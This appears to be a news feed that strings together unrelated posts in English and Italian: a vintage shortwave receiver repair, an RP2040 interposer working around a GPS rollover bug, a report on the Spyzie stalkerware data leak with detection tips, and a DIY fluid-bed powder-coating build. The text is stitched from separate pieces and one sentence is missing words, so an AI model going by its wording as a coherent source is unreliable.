Once powered up, the receiver sprang to life, picking up shortwave stations loud and clear. Hallicrafters’ legendary durability proved itself once before, in this fix that we covered last year. It’s a reminder that sometimes, the best repairs aren’t about drastic changes, but small, well-placed fixes.

What golden oldie did you manage to fix up?

youtube.com/embed/Nx8Mq9OCoRo?…

hackaday.com/2025/03/04/shortw…

We return to [Tom Verbeure] hacking on Symmetricom GPS receivers. This time, the problem’s more complicated, but the solution remains the same – hardware hacking. If you recall, the previous frontier was active antenna voltage compatibility – now, it’s rollover. See, the GPS receiver chip has its internal rollover date set to 18th of September 2022. We’ve passed this date a while back, but the receiver’s firmware isn’t new enough to know how to handle this. What to do? Build an interposer, of course.

You can bring the by sending some extra init commands to the GPS chipset during bootup, and, firmware hacking just wasn’t the route. An RP2040 board, a custom PCB, a few semi-bespoke connectors, and a few zero-ohm resistors was all it took to make this work. From there, a MITM firmware wakes up, sends the extra commands during power-on, and passes all the other traffic right through – the system suspects nothing.

Everything is open-source, as we could expect. The problem’s been solved, and, as a bonus, this implant gives a workaround path for any future bugs we might encounter as far as GPS chipset-to-receiver comms are concerned. Now, the revived S200 serves [Tom] in his hacking journeys, and we’re reminded that interposers remain a viable way to work around firmware bugs. Also, if the firmware (or the CPU) is way too old to work with, an interposer is a great first step to removing it out of the equation completely.

hackaday.com/2025/03/04/interp…

Spesso parliamo di Backdoor e di come queste qualora presenti possano essere scoperte e utilizzate dai malintenzionati. E oggi ci troviamo a commentare un ennesimo caso di questo genere.

Oltre mezzo milione di dispositivi Android e diverse migliaia di dispositivi iOS sono stati messi a rischio a causa di una vulnerabilità nell’app spia Spyzie, progettata per la sorveglianza segreta.

Lo ha riferito un ricercatore di sicurezza informatica, il Quale ha fornito un report a TechCrunch. La maggior parte dei possessori di dispositivi probabilmente non sa che i propri dati personali, tra cui messaggi, foto e geolocalizzazione, erano stati compromessi.

L’app Spyzie è vulnerabile allo stesso bug di Cocospy e Spyic, precedentemente criticati per aver divulgato i dati di oltre 2 milioni di utenti. Il bug consente ad aggressori terzi di accedere alle informazioni raccolte da queste app (sebbene il concetto di app implichi l’accesso da parte di una sola persona), nonché agli indirizzi e-mail dei clienti che utilizzano Spyzie per la sorveglianza.

Un ricercatore ha scoperto e condiviso con TechCrunch un database contenente 518.643 indirizzi email univoci dei clienti di Spyzie. Questi dati inoltre sono stati inviati a Troy Hunt, creatore di Have I Been Pwned, un sito web che monitora le fughe di informazioni.

Spyzie, come altre app simili, rimane nascosta sui dispositivi, rendendone difficile il rilevamento. La maggior parte delle vittime sono proprietari di dispositivi Android a cui è stato fisicamente effettuato l’accesso, spesso nell’ambito di relazioni violente. Per iPhone e iPad, Spyzie utilizza i dati di iCloud per accedere tramite gli account delle vittime.

La violazione dei dati di Spyzie segna la 24a volta dal 2017 che le app di sorveglianza vengono hackerate a causa di una scarsa sicurezza. Gli operatori di Spyzie non hanno ancora commentato la situazione, ma la vulnerabilità non è ancora stata risolta.

Per verificare se Spyzie è disponibile sui dispositivi Android, puoi comporre **001** nel dialer. Se l’app è installata, apparirà sullo schermo. Si consiglia ai possessori di iPhone e iPad di abilitare l’autenticazione a due fattori e di controllare l’elenco dei dispositivi connessi al proprio ID Apple.

incidenti come Spyzie, Cocospy e Spyic si possono trarre alcune conclusioni: anche se hai motivo di sospettare qualcosa del tuo partner, non dovresti installare una app spia sul suo smartphone. Una piccola vulnerabilità può far sì che i dati riservati del tuo partner siano visibili non solo a te, ma all’intera Rete.

Invece di mettere a repentaglio la privacy della persona cara, è meglio risolvere i problemi attraverso un dialogo aperto. La sorveglianza segreta non solo viola i confini personali, ma espone anche i dati a pericoli che non possono più essere corretti.

L'articolo Una falla nell’app spia Spyzie ha esposto dati sensibili di migliaia di utenti! proviene da il blog della sicurezza informatica.

[Pete] had a friend who would powder coat metal parts for him, but when he needed 16 metal parts coated, he decided he needed to develop a way to do it himself. Some research turned up the fluid bed method and he decided to go that route. He 3D printed a holder and you can see how it all turned out in the video below.

A coffee filter holds the powder in place. The powder is “fluidized” by airflow, which, in this case, comes from an aquarium pump. The first few designs didn’t work out well. Eventually, though, he had a successful fluid bed. You preheat the part so the powder will stick and then, as usual, bake the part in an oven to cure the powder. You can expect to spend some time getting everything just right. [Pete] had to divert airflow and adjust the flow rate to get everything to work right.

With conventional powder coating, you usually charge the piece you want to coat, but that’s not necessary here. You could try a few other things as suggested in the video comments: some suggested ditching the coffee filter, while others think agitating the powder would make a difference. Let us know what you find out.

This seems neater than the powder coating guns we’ve seen. Of course, these wheels had a great shape for powder coating, but sometimes it is more challenging.

youtube.com/embed/Kh5TEMo2bdc?…

hackaday.com/2025/03/04/inexpe…